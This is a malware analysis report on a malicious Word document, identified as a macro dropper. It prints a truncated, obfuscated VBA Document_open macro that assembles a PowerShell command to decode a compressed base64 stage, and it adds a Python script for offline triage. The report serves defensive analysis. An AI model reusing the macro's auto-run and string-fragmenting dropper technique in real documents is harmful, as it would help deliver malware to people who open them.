Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 17f33263e614cd38…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 262.8 KB
Created: 2018-07-10 22:29:00
Authoring application: Microsoft Office Word
First seen: 2018-07-27
MD5: 82c17ddcaf54eb90ba08c1038f6a71e4
SHA-1: 1281e51cad9669a106327f977f0c5edb978afed6
SHA-256: 17f33263e614cd38db13138aa887998f2cc93189b5d3f176a56ecdb360700291
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample carries a VBA macro in a Document_open handler, so it runs as soon as a user opens the document with macros enabled (hence T1204.002: the user has to open the file). The macro builds its command from short string literals interleaved with variable names that are never assigned; VBA evaluates such names as Empty, so they concatenate to nothing, and the surrounding junk arithmetic (protected by On Error Resume Next) is never used. Reading only the literals in the extracted source spells out "powershell ( New-OBjecT io.STReaMrEader( ( New-OBjecT IO.CompreSsioN.dEFlATestream([io.MEMORysTreAM] [SySTEM.converT]::fROMbASE64STrINg(" before the preview is cut off: a PowerShell stage carried inline as base64-encoded, Deflate-compressed text and inflated in memory. The random casing only defeats case-sensitive string signatures, since PowerShell itself is case-insensitive. That decoded stage downloads a payload from a hardcoded URL and executes it. Note that this URL is not among the URLs extracted below; the single extracted URL is a benign Office XML namespace, so the download address has to be taken from the decoded stage rather than from the document body. The ClamAV signature (Doc.Dropper.Agent) agrees with this dropper role.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6607195-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6607195-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The VBA source contains a Shell() call that launches an external process. In the preview below, the assembled command is handed to uQYGZPStN, whose body lies outside the portion shown.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    The macro is attached to Document_Open, so it runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This heuristic catches p-code-only macro documents, or documents whose source extraction fails, where no readable source is available.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace that Office writes into every document with drawing content; it is an artifact of the file format, not a contact address.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19426 bytes
SHA-256: bcd0219c31bd0276e2a730b8a6daf32442cecf0c0bfe770a44ad897f213d6940

Preview of the extracted script (first 1,000 lines; truncated below):
Attribute VB_Name = "bkAzGRGn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   YXsiT = 99982 - rNRSDC * lDPuj / NQoYK
   QIlMB = 40429 - rMbHmB * ijEAuK / XEdaKf
   Ilrpb = 70219 + HnHLPz * 14988 * jMpIwd * (ScRaa / wDCIkf * (37250 + Zstlv / 38294 - AWwfZ))
   DoYuam = 36267 + YAKiK * 69164 * CfUoj * (TvXDJ / RFSvA * (30030 + AOkpE / 62862 - KTsaQ))
uQYGZPStN ("" + UTfpcibFQiVV + HIiOfhjYQdj + sACvL + RvWQvJEKo + QUvbOfJmF + USKlDfksBrQkAJ + JPDjqSq)
   fwzDw = 74248 + RVlzl * 29857 * cPWjw * (vzBNnR / GAFBc * (88404 + XjkpEE / 31530 - fYGTu))
End Sub


Attribute VB_Name = "TUircLjzlPf"
Function sACvL()
On Error Resume Next
cCIaQh = 31088 * VPRwkK + (24244 - AYHZt - PaZbH + 52700 + CXPcq - XGrdjT * 57598 + DPGCEw)
   SYOpZm = 65046 * oZoRS + (84734 - Vujpz - vaFPS + 22723 + SYDfC - FrNAE * 69994 + qoGiM)
zHLPBr = "p" + kIXGYnWzJ + aWiPWJPL + "o" + IubFYSHU + AAzhQfY + "we" + itEZwJCHYj + GYBcNvBAVPdiYG + "rsh" + BzrklsERDU + VLikFFtbwFDjWc + "e" + QWBridGZs + OUkZsRGf + "ll" + scSMzcvwHOI + AjTmMrEJrVtf + " " + fKRQzomY + ijBKdlWDUjjs + "( N" + tnFWAHZhsQP + zKFwcmkHdqujG + "ew-" + KXcmlmXKjQXnI + lurvYsPkGGoYP + "OBj" + puHkXUnd + ZAViFzc + "e" + FzpKawvnWjwN + YacfYZWzR + "cT" + wstCAHMNcrKAj + bhQwDpRmzIcTD + "  " + HiwRbECkV + zfWNZswkzpjU + "io" + hFvuXnI + jcBSFjZwu + ".S"
pmQji = (VSmaaN + OuwGq) - 95972 * bWRmlY - sBYsmw + OuoMM
   qqmIO = (DLkSGw + rSUizJ) - 17448 * ROhoQs - zKtiJ + ljfdW
OcGaNz = "TR" + RFmpJbvZJOCi + bFTwzDLZZc + "e" + GlpAbblvAI + GQEZAfbidMFZJY + "aM" + VrjKBpVJkI + ttYSKUrhwlY + "r" + IrujPrC + aIckzRvup + "Ea" + AljnmPphCVjSm + zbdVRkkbSPqZWZ + "de" + wjBzWHG + BVowrqpaETURUa + "r(" + KRYwqTHQR + kKXqUjVPOvib + " (" + zSFRmcG + LqhzJiOXiEFE + " N" + dzhwKsUjpzvr + wfJiqcL + "ew" + lMhzYzXTvjlcS + wBNfAiCShNY + "-O" + aOmVcMvmcswjSf + PYjafioO + "Bj" + EjtAmzActhwQzG + TIRziDCLRosYO + "ec" + XodHLsbGwj + SKzYZRoPjzhR + "T " + ijwHbOBHZbWw + rCUStQjASPSGac + "IO" + HMGiJsHpEbk + XBaVoXddOXkw + ".Co"
ioVnY = (wTKsS + wufOSj) - 46362 * uNsll - PwtoV + bbYBjn
ujcfzZESKdG = "mp" + ErhCzZjzzFEa + UwjCUzCZWX + "re" + XVifiUbdq + jmffwtiQ + "S" + FEEzkrzk + KPlBNTUajw + "sio" + wmAQoTDfoGi + RZjtcitMC + "N" + AdSfZHjGVY + wUCdjwjDj + ".dE" + vunjGUuUvmjP + XGjZbht + "FlA" + hYaAMNWv + tWllaZlbE + "Te" + SFrdJrziFAq + GHjUhGZrszRim + "str" + zqGoBaO + XDVXRiRCmzfS + "eam" + twkoZHazW + iOuChMrowzdkC + "([" + jOropnGZ + RmpMIXhwimTWA + "io." + niuTPNhOPbLI + EYpiMQaCcqZw + "ME" + nqJOmDBJLG + jXakwPzPZNi + "M"
oLlCEu = aJbYR / VihvNi / jjDbrt * zWwZM / 41078 + zsPHGM * (56304 - ZvBTz - 88512 * iiAvC)
QGINN = "OR" + JKLkVELB + XYmRnGWIhGHaYu + "ys" + nTZQTVpjFzv + zOuqWbVj + "T" + uYtXBAjmQUtQr + dCiCLqLvBksMkB + "re" + sWcirZzojWLiGN + SutZnhFAjd + "AM" + IozkwbBuOzDDE + pfjonDVup + "]" + GLQcvOhKfvWaf + lIUrpVtN + " [" + CoEjntKcFU + mBoWtNXTEBJ + "S" + MZwSXMzzG + cbsBLwZKXG + "yST"
KKTqLZ = aEkMQL / cjcqPU / GEoHRj * XkBvIY / 70392 + oMiSN * (47978 - jVicD - 49720 * wwwSfD)
   CTcjq = RBfdQb / MKiIr / jHPtRV * HGbwD / 23159 + GvwujH * (4548 - suzKRi - 99225 * rCfbpL)
nAXfp = "EM." + tqjCTiRInDGv + wGVAXSYp + "con" + bmCwpshPId + iWmwDaoATAh + "ve" + MKDiNJDJMbhfST + qnnbTczNZP + "r" + jDaEQzd + hvThTRvESkG + "T" + cNuKfjLpJzL + JAdOTqNsJsT + "]:" + KEIGirI + NJGTtWoXzIf + ":fR" + ubDQQimS + QfYHjCSTsbi + "OM"
MccvR = WazcD / GzIqh / QTmUzR * UZwYB / 1492 + YcEqL * (75655 - LtcWu - 88336 * tHjYfz)
   IAzrD = uLNLCJ / CObiPI / ipoUPI * iomNa / 12163 + vQTni * (62830 - PCTWzz - 747 * rOMZw)
DOKVpFjSIm = "b" + rfKlwpZCwbt + tRftMFaKwDX + "AS" + SNAWCiGwMLB + VTZZTAZPN + "E" + llZqVtbmDVXMC + OthjGistkG + "64S" + kXILEvHkRE + TjOwwzHWzul + "T" + hLOsspkkUrPu + QvpHKdGMW + "rI"
wmzOZp = ciXjts / Pfqzr / DnfqbK * bCaVow / 97631 + CkWvCd * (34344 - vhBziu - 96012 * MiPqJ)
MrskVqUEl = "Ng" + OBKZDBuutdNu + pWmHjIa + "(" + hEKIJ
... (truncated)
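The following Python script is an added triage example, not code from the report or from the sample. It rebuilds the PowerShell command that Function sACvL assembles from the string literals shown in the preview above (dropping the never-assigned names, which VBA evaluates as Empty, and skipping the junk arithmetic lines), flags the suspicious tokens case-insensitively, and shows how to inflate the base64 + Deflate stage such a command feeds to DeflateStream without running it. Its sample input is copied from the preview; it assumes the pieces are joined in source order (the preview is truncated before the join site), and the Deflate blob it inflates is a constructed stand-in because the real blob is not in the preview.

```python
"""Offline triage of the fragmented-string macro shown in this report.

Added example, not code from the report: it rebuilds the PowerShell command
that Function sACvL assembles from string literals interleaved with names that
are never assigned (VBA treats those as Empty, so "a" + Empty + "b" is "ab"),
then inflates a base64 + Deflate stage of the kind that command feeds to
DeflateStream, without executing anything. Assumption: the pieces are joined
in source order; the report's preview is truncated before the join site.
"""
import base64
import re
import zlib

# Sample input, copied from the macros.bas preview in this report: the junk
# arithmetic of Document_open plus the string-building lines of sACvL.
SAMPLE_VBA = r'''
Private Sub Document_open()
On Error Resume Next
   YXsiT = 99982 - rNRSDC * lDPuj / NQoYK
uQYGZPStN ("" + UTfpcibFQiVV + HIiOfhjYQdj + sACvL + RvWQvJEKo + QUvbOfJmF + USKlDfksBrQkAJ + JPDjqSq)
End Sub
Function sACvL()
On Error Resume Next
cCIaQh = 31088 * VPRwkK + (24244 - AYHZt - PaZbH + 52700 + CXPcq - XGrdjT * 57598 + DPGCEw)
zHLPBr = "p" + kIXGYnWzJ + aWiPWJPL + "o" + IubFYSHU + AAzhQfY + "we" + itEZwJCHYj + GYBcNvBAVPdiYG + "rsh" + BzrklsERDU + VLikFFtbwFDjWc + "e" + QWBridGZs + OUkZsRGf + "ll" + scSMzcvwHOI + AjTmMrEJrVtf + " " + fKRQzomY + ijBKdlWDUjjs + "( N" + tnFWAHZhsQP + zKFwcmkHdqujG + "ew-" + KXcmlmXKjQXnI + lurvYsPkGGoYP + "OBj" + puHkXUnd + ZAViFzc + "e" + FzpKawvnWjwN + YacfYZWzR + "cT" + wstCAHMNcrKAj + bhQwDpRmzIcTD + "  " + HiwRbECkV + zfWNZswkzpjU + "io" + hFvuXnI + jcBSFjZwu + ".S"
pmQji = (VSmaaN + OuwGq) - 95972 * bWRmlY - sBYsmw + OuoMM
OcGaNz = "TR" + RFmpJbvZJOCi + bFTwzDLZZc + "e" + GlpAbblvAI + GQEZAfbidMFZJY + "aM" + VrjKBpVJkI + ttYSKUrhwlY + "r" + IrujPrC + aIckzRvup + "Ea" + AljnmPphCVjSm + zbdVRkkbSPqZWZ + "de" + wjBzWHG + BVowrqpaETURUa + "r(" + KRYwqTHQR + kKXqUjVPOvib + " (" + zSFRmcG + LqhzJiOXiEFE + " N" + dzhwKsUjpzvr + wfJiqcL + "ew" + lMhzYzXTvjlcS + wBNfAiCShNY + "-O" + aOmVcMvmcswjSf + PYjafioO + "Bj" + EjtAmzActhwQzG + TIRziDCLRosYO + "ec" + XodHLsbGwj + SKzYZRoPjzhR + "T " + ijwHbOBHZbWw + rCUStQjASPSGac + "IO" + HMGiJsHpEbk + XBaVoXddOXkw + ".Co"
ujcfzZESKdG = "mp" + ErhCzZjzzFEa + UwjCUzCZWX + "re" + XVifiUbdq + jmffwtiQ + "S" + FEEzkrzk + KPlBNTUajw + "sio" + wmAQoTDfoGi + RZjtcitMC + "N" + AdSfZHjGVY + wUCdjwjDj + ".dE" + vunjGUuUvmjP + XGjZbht + "FlA" + hYaAMNWv + tWllaZlbE + "Te" + SFrdJrziFAq + GHjUhGZrszRim + "str" + zqGoBaO + XDVXRiRCmzfS + "eam" + twkoZHazW + iOuChMrowzdkC + "([" + jOropnGZ + RmpMIXhwimTWA + "io." + niuTPNhOPbLI + EYpiMQaCcqZw + "ME" + nqJOmDBJLG + jXakwPzPZNi + "M"
QGINN = "OR" + JKLkVELB + XYmRnGWIhGHaYu + "ys" + nTZQTVpjFzv + zOuqWbVj + "T" + uYtXBAjmQUtQr + dCiCLqLvBksMkB + "re" + sWcirZzojWLiGN + SutZnhFAjd + "AM" + IozkwbBuOzDDE + pfjonDVup + "]" + GLQcvOhKfvWaf + lIUrpVtN + " [" + CoEjntKcFU + mBoWtNXTEBJ + "S" + MZwSXMzzG + cbsBLwZKXG + "yST"
nAXfp = "EM." + tqjCTiRInDGv + wGVAXSYp + "con" + bmCwpshPId + iWmwDaoATAh + "ve" + MKDiNJDJMbhfST + qnnbTczNZP + "r" + jDaEQzd + hvThTRvESkG + "T" + cNuKfjLpJzL + JAdOTqNsJsT + "]:" + KEIGirI + NJGTtWoXzIf + ":fR" + ubDQQimS + QfYHjCSTsbi + "OM"
DOKVpFjSIm = "b" + rfKlwpZCwbt + tRftMFaKwDX + "AS" + SNAWCiGwMLB + VTZZTAZPN + "E" + llZqVtbmDVXMC + OthjGistkG + "64S" + kXILEvHkRE + TjOwwzHWzul + "T" + hLOsspkkUrPu + QvpHKdGMW + "rI"
MrskVqUEl = "Ng" + OBKZDBuutdNu + pWmHjIa + "(" + hEKIJ
'''

ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# A token is a VBA string literal (a quote inside is escaped as ""), an
# identifier, or any other single non-space character (operators, digits).
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)|(\S)')

SUSPICIOUS = ("powershell", "new-object", "frombase64string", "deflatestream",
              "streamreader", "downloadstring", "downloadfile", "invoke-expression")


def resolve_concat(rhs, env):
    """Evaluate a right-hand side made only of literals, names and '+'.
    Returns None when any other operator appears (the junk arithmetic lines)."""
    out = []
    for m in TOKEN.finditer(rhs):
        lit, name, other = m.group(1), m.group(2), m.group(3)
        if lit is not None:
            out.append(lit.replace('""', '"'))
        elif name is not None:
            out.append(env.get(name, ""))   # never-assigned Variant -> Empty -> ""
        elif other != "+":
            return None
    return "".join(out)


def recover_strings(vba_source):
    """Map each string-building assignment to its resolved value, in source order."""
    env = {}
    for line in vba_source.splitlines():
        m = ASSIGN.match(line)
        if not m or '"' not in m.group(2):
            continue                         # not an assignment, or nothing to rebuild
        value = resolve_concat(m.group(2), env)
        if value is not None:
            env[m.group(1)] = value
    return env


def recover_command(vba_source):
    """Join the recovered pieces in source order (the assumption stated above)."""
    return "".join(recover_strings(vba_source).values())


def indicators(command):
    """Case-insensitive match: the sample's random casing defeats only case-sensitive signatures."""
    low = command.lower()
    return [t for t in SUSPICIOUS if t in low]


def inflate_stage(b64_blob):
    """Decode what the command hands to DeflateStream. .NET DeflateStream is raw
    Deflate with no zlib header, hence wbits=-15; the default header check would fail."""
    return zlib.decompress(base64.b64decode(b64_blob), -15).decode("utf-8", "replace")


def make_demo_blob(script):
    """Constructed stand-in for the sample's real blob, which the preview truncates."""
    c = zlib.compressobj(wbits=-15)
    return base64.b64encode(c.compress(script.encode()) + c.flush()).decode()


if __name__ == "__main__":
    cmd = recover_command(SAMPLE_VBA)
    print("recovered :", cmd)
    print("indicators:", indicators(cmd))
    print("inflated  :", inflate_stage(make_demo_blob("Write-Host 'constructed second stage'")))
```

To use it on the real artifact, replace SAMPLE_VBA with the full macros.bas (for example the source olevba extracts from the document) to recover the complete command together with the base64 blob that follows FromBase64String(, and pass that blob to inflate_stage rather than to PowerShell. Anything the inflated stage does (the download URL, what it runs) is then readable without detonating the sample.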